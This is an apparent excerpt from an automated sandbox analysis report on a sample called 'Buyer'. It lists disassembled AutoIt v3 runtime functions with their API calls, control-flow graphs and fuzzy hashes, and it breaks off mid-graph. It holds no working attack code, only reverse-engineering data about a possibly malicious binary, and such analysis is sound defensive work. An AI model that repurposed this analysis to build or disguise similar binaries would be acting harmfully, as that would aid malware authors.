                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F4E0C8
                                                                                                    • TranslateMessage.USER32(?), ref: 00F4E11B
                                                                                                    • DispatchMessageW.USER32(?), ref: 00F4E129
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F4E13F
                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00F4E151
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2189390790-0
                                                                                                    • Opcode ID: 2e3d7c1e8bd1b9eaf22be55f6af60d53316d07d52b9e47b3b59f8119f60132fa
                                                                                                    • Instruction ID: 3377a0b8500c42edab11015b6faa6fda851865e96226d25db086af44b60b8bbd
                                                                                                    • Opcode Fuzzy Hash: 2e3d7c1e8bd1b9eaf22be55f6af60d53316d07d52b9e47b3b59f8119f60132fa
                                                                                                    • Instruction Fuzzy Hash: D742F771A08341EFEB38CF24C844F6ABBE5BF45324F14451DE85687291D779E888EB92
                                                                                                    Function 00F429BC Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F429EF
                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00F42A19
                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F42A2A
                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00F42A47
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F42A57
                                                                                                    • LoadIconW.USER32(000000A9), ref: 00F42A6D
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F42A7C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                    • Opcode ID: 68de691557400503a10e5b2a6e081c27cf9dd247e9eb829f00a049d5a17cfe8f
                                                                                                    • Instruction ID: c8c82987181e8c288efdfd254c6a7370068fbe44fb2fcb3becdad6c46953ad78
                                                                                                    • Opcode Fuzzy Hash: 68de691557400503a10e5b2a6e081c27cf9dd247e9eb829f00a049d5a17cfe8f
                                                                                                    • Instruction Fuzzy Hash: 812106B1D02308EFDB10DFA8E889BDDBBB6FB08700F10411AF651A6294D7BA4544DF95
                                                                                                    Function 00F809AE Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 298 f809ae-f809de call f80782 301 f809f9-f80a05 call f75571 298->301 302 f809e0-f809eb call f72b55 298->302 308 f80a1e-f80a67 call f806ed 301->308 309 f80a07-f80a1c call f72b55 call f72b68 301->309 307 f809ed-f809f4 call f72b68 302->307 319 f80cd0-f80cd6 307->319 317 f80a69-f80a72 308->317 318 f80ad4-f80add GetFileType 308->318 309->307 321 f80aa9-f80acf GetLastError call f72b32 317->321 322 f80a74-f80a78 317->322 323 f80adf-f80b10 GetLastError call f72b32 CloseHandle 318->323 324 f80b26-f80b29 318->324 321->307 322->321 327 f80a7a-f80aa7 call f806ed 322->327 323->307 335 f80b16-f80b21 call f72b68 323->335 325 f80b2b-f80b30 324->325 326 f80b32-f80b38 324->326 331 f80b3c-f80b8a call f754ba 325->331 326->331 332 f80b3a 326->332 327->318 327->321 341 f80b9a-f80bbe call f804a0 331->341 342 f80b8c-f80b98 call f808fe 331->342 332->331 335->307 347 f80bc0 341->347 348 f80bd1-f80c14 341->348 342->341 349 f80bc2-f80bcc call f789fe 342->349 347->349 351 f80c35-f80c43 348->351 352 f80c16-f80c1a 348->352 349->319 355 f80c49-f80c4d 351->355 356 f80cce 351->356 352->351 354 f80c1c-f80c30 352->354 354->351 355->356 357 f80c4f-f80c82 CloseHandle call f806ed 355->357 356->319 360 f80c84-f80cb0 GetLastError call f72b32 call f75683 357->360 361 f80cb6-f80cca 357->361 360->361 361->356
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F806ED: CreateFileW.KERNEL32(00000000,00000000,?,00F80A57,?,?,00000000,?,00F80A57,00000000,0000000C), ref: 00F8070A
                                                                                                    • GetLastError.KERNEL32 ref: 00F80AC2
                                                                                                    • __dosmaperr.LIBCMT ref: 00F80AC9
                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00F80AD5
                                                                                                    • GetLastError.KERNEL32 ref: 00F80ADF
                                                                                                    • __dosmaperr.LIBCMT ref: 00F80AE8
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00F80B08
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00F80C52
                                                                                                    • GetLastError.KERNEL32 ref: 00F80C84
                                                                                                    • __dosmaperr.LIBCMT ref: 00F80C8B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                    • String ID: H
                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                    • Opcode ID: dcc6bb094829ecd05137b46c3cb46803a2e7a578939c5e2aa8b04dd0be67a8b6
                                                                                                    • Instruction ID: 1889e1f3551483b448003338df9bb9fb8d1891765d41ecfb250da5f8a9514cb3
                                                                                                    • Opcode Fuzzy Hash: dcc6bb094829ecd05137b46c3cb46803a2e7a578939c5e2aa8b04dd0be67a8b6
                                                                                                    • Instruction Fuzzy Hash: 53A10532A001089FDF19AF78DC527ED7BA1AB46324F14015EF815AB291DB398C16EB52
                                                                                                    Function 00F43AE4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00F43DD1: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00F82A98,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00F43DEF
                                                                                                      • Part of subcall function 00F43A75: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F43A97
                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F43C01
                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F839E6
                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F83A27
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00F83A69
                                                                                                    • _wcslen.LIBCMT ref: 00F83AD0
                                                                                                    • _wcslen.LIBCMT ref: 00F83ADF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                    • API String ID: 98802146-2727554177
                                                                                                    • Opcode ID: 317ae5f553243a23ddec799676eefe142ad1630129a523f3f637c13b148e330d
                                                                                                    • Instruction ID: 97d299e6fb8ae03c513f2f14e562f7be8ce76a902b5c07a32c6236dcf0c1e241
                                                                                                    • Opcode Fuzzy Hash: 317ae5f553243a23ddec799676eefe142ad1630129a523f3f637c13b148e330d
                                                                                                    • Instruction Fuzzy Hash: 4071BE715043019FC314EF65D8818ABBBE8FF84760F40442EF8809B2A5EF7E9A49DB52
                                                                                                    Function 00F4286B Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F42876
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00F42885
                                                                                                    • LoadIconW.USER32(00000063), ref: 00F4289B
                                                                                                    • LoadIconW.USER32(000000A4), ref: 00F428AD
                                                                                                    • LoadIconW.USER32(000000A2), ref: 00F428BF
                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F428D7
                                                                                                    • RegisterClassExW.USER32(?), ref: 00F42928
                                                                                                      • Part of subcall function 00F429BC: GetSysColorBrush.USER32(0000000F), ref: 00F429EF
                                                                                                      • Part of subcall function 00F429BC: RegisterClassExW.USER32(00000030), ref: 00F42A19
                                                                                                      • Part of subcall function 00F429BC: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F42A2A
                                                                                                      • Part of subcall function 00F429BC: InitCommonControlsEx.COMCTL32(?), ref: 00F42A47
                                                                                                      • Part of subcall function 00F429BC: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F42A57
                                                                                                      • Part of subcall function 00F429BC: LoadIconW.USER32(000000A9), ref: 00F42A6D
                                                                                                      • Part of subcall function 00F429BC: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F42A7C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                    • API String ID: 423443420-4155596026
                                                                                                    • Opcode ID: 8247a8c44740b75040ffaccbae66f9a228e2738e2255d5026f2dc86ce13075f2
                                                                                                    • Instruction ID: 0a1d548cbb4d699201b00b0f541851f70c2bfb4715c13f42b17cc03a7de4aa27
                                                                                                    • Opcode Fuzzy Hash: 8247a8c44740b75040ffaccbae66f9a228e2738e2255d5026f2dc86ce13075f2
                                                                                                    • Instruction Fuzzy Hash: 81216F70E00318AFDB209FA5EC45B9DBFB5FB48B50F60806AF544A62A4D3BE0540DF90
                                                                                                    Function 00FC0CE2 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 439 fc0ce2-fc0d19 call f4d530 442 fc0d39-fc0d4b WSAStartup 439->442 443 fc0d1b-fc0d28 call f4b81d 439->443 445 fc0d4d-fc0d5b 442->445 446 fc0d7e-fc0dbb call f5c0af call f47e30 call f5fac6 inet_addr gethostbyname 442->446 443->442 451 fc0d2a-fc0d35 call f4b81d 443->451 448 fc0d5d 445->448 449 fc0d60-fc0d70 445->449 462 fc0dcc-fc0dda 446->462 463 fc0dbd-fc0dca IcmpCreateFile 446->463 448->449 452 fc0d75-fc0d79 449->452 453 fc0d72 449->453 451->442 456 fc0f73-fc0f7b 452->456 453->452 465 fc0ddc 462->465 466 fc0ddf-fc0def 462->466 463->462 464 fc0dfd-fc0e2a call f6015b call f43966 463->464 475 fc0e2c-fc0e53 IcmpSendEcho 464->475 476 fc0e55-fc0e72 IcmpSendEcho 464->476 465->466 467 fc0df4-fc0df8 466->467 468 fc0df1 466->468 470 fc0f6a-fc0f6e call f4ac28 467->470 468->467 470->456 477 fc0e76-fc0e78 475->477 476->477 478 fc0ed8-fc0ee6 477->478 479 fc0e7a-fc0e7f 477->479 482 fc0ee8 478->482 483 fc0eeb-fc0ef2 478->483 480 fc0e85-fc0e8a 479->480 481 fc0f22-fc0f34 call f4d530 479->481 484 fc0e8c-fc0e91 480->484 485 fc0ef4-fc0f02 480->485 497 fc0f3a 481->497 498 fc0f36-fc0f38 481->498 482->483 487 fc0f0e-fc0f17 483->487 484->478 490 fc0e93-fc0e98 484->490 492 fc0f04 485->492 493 fc0f07 485->493 488 fc0f1c-fc0f20 487->488 489 fc0f19 487->489 494 fc0f3c-fc0f53 IcmpCloseHandle WSACleanup 488->494 489->488 495 fc0ebd-fc0ecb 490->495 496 fc0e9a-fc0e9f 490->496 492->493 493->487 494->470 502 fc0f55-fc0f67 call f6011d call f60164 494->502 500 fc0ecd 495->500 501 fc0ed0-fc0ed6 495->501 496->485 499 fc0ea1-fc0eaf 496->499 497->494 498->494 503 fc0eb4-fc0ebb 499->503 504 fc0eb1 499->504 500->501 501->487 502->470 503->487 504->503
                                                                                                    APIs
                                                                                                    • WSAStartup.WS2_32(00000101,?), ref: 00FC0D43
                                                                                                    • inet_addr.WSOCK32(?), ref: 00FC0DA3
                                                                                                    • gethostbyname.WS2_32(?), ref: 00FC0DAF
                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 00FC0DBD
                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00FC0E4D
                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00FC0E6C
                                                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 00FC0F40
                                                                                                    • WSACleanup.WSOCK32 ref: 00FC0F46
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                    • String ID: Ping
                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                    • Opcode ID: 87bd4f4c2f90f940d6144acec694adffb637df47b7312eeeea889caea64a2d27
                                                                                                    • Instruction ID: b40b2f1f7f8eb7156df938ab6765c4dae8fcf4244e01714d93b7cf34769079ba
                                                                                                    • Opcode Fuzzy Hash: 87bd4f4c2f90f940d6144acec694adffb637df47b7312eeeea889caea64a2d27
                                                                                                    • Instruction Fuzzy Hash: B7919271904202DFD720DF29C985F16BBE5EF44328F14899DF4698B6A2CB34ED46DB81
                                                                                                    Function 00F42F92 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 509 f42f92-f42fa7 510 f43007-f43009 509->510 511 f42fa9-f42fac 509->511 510->511 512 f4300b 510->512 513 f4300d 511->513 514 f42fae-f42fb5 511->514 515 f42ff2-f42ffa DefWindowProcW 512->515 516 f43013-f43018 513->516 517 f83084-f830ac call f44286 call f5f09a 513->517 518 f43087-f4308f PostQuitMessage 514->518 519 f42fbb-f42fc0 514->519 523 f43000-f43006 515->523 525 f4303f-f43066 SetTimer RegisterWindowMessageW 516->525 526 f4301a-f4301d 516->526 552 f830b1-f830b8 517->552 524 f4303b-f4303d 518->524 520 f42fc6-f42fca 519->520 521 f830f1-f83105 call fac631 519->521 527 f42fd0-f42fd5 520->527 528 f43091-f4309b call f5fc73 520->528 521->524 544 f8310b 521->544 524->523 525->524 529 f43068-f43073 CreatePopupMenu 525->529 532 f43023-f43036 KillTimer call f42f14 call f447a8 526->532 533 f83025-f83028 526->533 534 f830d6-f830dd 527->534 535 f42fdb-f42fe0 527->535 546 f430a0 528->546 529->524 532->524 539 f8302a-f8302e 533->539 540 f83060-f8307f MoveWindow 533->540 534->515 550 f830e3-f830ec call fa11b9 534->550 542 f43075-f43085 call f430a2 535->542 543 f42fe6-f42fec 535->543 547 f8304f-f8305b SetFocus 539->547 548 f83030-f83033 539->548 540->524 542->524 543->515 543->552 544->515 546->524 547->524 548->543 553 f83039-f8304a call f44286 548->553 550->515 552->515 558 f830be-f830d1 call f42f14 call f43989 552->558 553->524 558->515
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00F42F8C,?,?), ref: 00F42FFA
                                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00F42F8C,?,?), ref: 00F43026
                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F43049
                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00F42F8C,?,?), ref: 00F43054
                                                                                                    • CreatePopupMenu.USER32 ref: 00F43068
                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00F43089
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                    • String ID: TaskbarCreated
                                                                                                    • API String ID: 129472671-2362178303
                                                                                                    • Opcode ID: 3d0bd002004879e58f78c3d28c339b234fdbfd0ce38fcabda30ab96458abaa9b
                                                                                                    • Instruction ID: 92619dd7ed014875bef893b2fc97899edaf18a912cf2bd8e393ee12c2119f05b
                                                                                                    • Opcode Fuzzy Hash: 3d0bd002004879e58f78c3d28c339b234fdbfd0ce38fcabda30ab96458abaa9b
                                                                                                    • Instruction Fuzzy Hash: 51413732704144ABDB282B7CDC0DBB93F2AEB40368F54422AFD4286295DB7E9F45B351
                                                                                                    Function 00F79095 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 565 f79095-f790a5 566 f790a7-f790ba call f72b55 call f72b68 565->566 567 f790bf-f790c1 565->567 581 f79441 566->581 568 f790c7-f790cd 567->568 569 f79429-f79436 call f72b55 call f72b68 567->569 568->569 573 f790d3-f790fe 568->573 587 f7943c call f72aac 569->587 573->569 576 f79104-f7910d 573->576 579 f79127-f79129 576->579 580 f7910f-f79122 call f72b55 call f72b68 576->580 584 f79425-f79427 579->584 585 f7912f-f79133 579->585 580->587 586 f79444-f79449 581->586 584->586 585->584 589 f79139-f7913d 585->589 587->581 589->580 592 f7913f-f79156 589->592 593 f79173-f7917c 592->593 594 f79158-f7915b 592->594 598 f7917e-f79195 call f72b55 call f72b68 call f72aac 593->598 599 f7919a-f791a4 593->599 596 f79165-f7916e 594->596 597 f7915d-f79163 594->597 600 f7920f-f79229 596->600 597->596 597->598 630 f7935c 598->630 602 f791a6-f791a8 599->602 603 f791ab-f791ac call f73b70 599->603 605 f7922f-f7923f 600->605 606 f792fd-f79306 call f7fbee 600->606 602->603 611 f791b1-f791c9 call f72d18 * 2 603->611 605->606 610 f79245-f79247 605->610 619 f79379 606->619 620 f79308-f7931a 606->620 610->606 615 f7924d-f79273 610->615 634 f791e6-f7920c call f79774 611->634 635 f791cb-f791e1 call f72b68 call f72b55 611->635 615->606 616 f79279-f7928c 615->616 616->606 621 f7928e-f79290 616->621 623 f7937d-f79395 ReadFile 619->623 620->619 625 f7931c-f7932b GetConsoleMode 620->625 621->606 626 f79292-f792bd 621->626 628 f79397-f7939d 623->628 629 f793f1-f793fc GetLastError 623->629 625->619 631 f7932d-f79331 625->631 626->606 633 f792bf-f792d2 626->633 628->629 638 f7939f 628->638 636 f79415-f79418 629->636 637 f793fe-f79410 call f72b68 call f72b55 629->637 632 f7935f-f79369 call f72d18 630->632 631->623 639 f79333-f7934d ReadConsoleW 631->639 632->586 633->606 641 f792d4-f792d6 633->641 634->600 635->630 648 f79355-f7935b call f72b32 636->648 649 f7941e-f79420 636->649 637->630 645 f793a2-f793b4 638->645 646 f7934f GetLastError 639->646 647 f7936e-f79377 639->647 641->606 651 f792d8-f792f8 641->651 645->632 655 f793b6-f793ba 645->655 646->648 647->645 648->630 649->632 651->606 660 f793d3-f793de 655->660 661 f793bc-f793cc call f78db1 655->661 662 f793e0 call f78f01 660->662 663 f793ea-f793ef call f78bf1 660->663 672 f793cf-f793d1 661->672 670 f793e5-f793e8 662->670 663->670 670->672 672->632
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f88b3afe709533bdf28c6f246fcf8fa9ecc13d1630cd48b1b9b0d87f7d67d3f6
                                                                                                    • Instruction ID: 153d5c28ae023a7034300567f3bd050ad9c5b80b0a2a593a2decc1abc92b8dd6
                                                                                                    • Opcode Fuzzy Hash: f88b3afe709533bdf28c6f246fcf8fa9ecc13d1630cd48b1b9b0d87f7d67d3f6
                                                                                                    • Instruction Fuzzy Hash: 0DC10771D08249AFDF11DFACD881BAD7BB5BF09310F14814AE51CA7392C7B89941EB62
                                                                                                    Function 00F5AAF7 Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 673 f5aaf7-f5af1c call f47e30 call f5bb11 call f4d530 680 f5af22-f5af2c 673->680 681 f98446-f98453 673->681 682 f9882d-f9883b 680->682 683 f5af32-f5af37 680->683 684 f98458-f98467 681->684 685 f98455 681->685 690 f9883d 682->690 691 f98840 682->691 686 f5af3d-f5af49 call f5b46f 683->686 687 f98474-f98476 683->687 688 f98469 684->688 689 f9846c 684->689 685->684 694 f9847f 686->694 698 f5af4f-f5af5c call f4b81d 686->698 687->694 688->689 689->687 690->691 692 f98847-f98850 691->692 695 f98852 692->695 696 f98855 692->696 699 f98489 694->699 695->696 700 f9885e-f988ad call f4d530 call f5ba77 * 2 696->700 706 f5af64-f5af6d 698->706 704 f98491-f98494 699->704 738 f988b3-f988c5 call f5b46f 700->738 739 f5b099-f5b0ae 700->739 707 f9849a-f984c2 call f64cb3 call f469c4 704->707 708 f5b011-f5b028 704->708 710 f5af71-f5af8f call f64d78 706->710 749 f984ef-f98513 call f46a09 call f4ac28 707->749 750 f984c4-f984c8 707->750 713 f5b02e 708->713 714 f98816-f98819 708->714 723 f5af91-f5af9a 710->723 724 f5af9e 710->724 718 f5b034-f5b037 713->718 719 f987c1-f987e2 call f4d530 713->719 720 f9881f-f98822 714->720 721 f98903-f9893b call f4d530 call f5ba77 714->721 729 f985eb-f98605 call f5ba77 718->729 730 f5b03d-f5b040 718->730 719->739 742 f987e8-f987fa call f5b46f 719->742 720->700 731 f98824-f98827 720->731 721->739 780 f98941-f98953 call f5b46f 721->780 723->710 732 f5af9c 723->732 724->699 734 f5afa4-f5afb5 724->734 760 f9860b-f9860e 729->760 761 f98751-f98777 call f4d530 729->761 740 f5b046-f5b049 730->740 741 f9858c-f985a2 call f45a63 730->741 731->682 731->739 732->734 734->682 743 f5afbb-f5afd5 734->743 771 f988f1-f988fe call f4b81d 738->771 772 f988c7-f988cf 738->772 744 f5b0b4-f5b0c4 call f4d530 739->744 745 f9898b-f98991 739->745 752 f98518-f9851b 740->752 753 f5b04f-f5b071 call f4d530 740->753 741->739 769 f985a8-f985be call f5b46f 741->769 791 f987fc-f98805 call f4b81d 742->791 792 f98807 742->792 743->704 757 f5afdb-f5b00d call f5ba77 call f4d530 743->757 745->706 763 f98997 745->763 749->752 750->749 765 f984ca-f984ed call f49c50 750->765 752->682 758 f98521-f98536 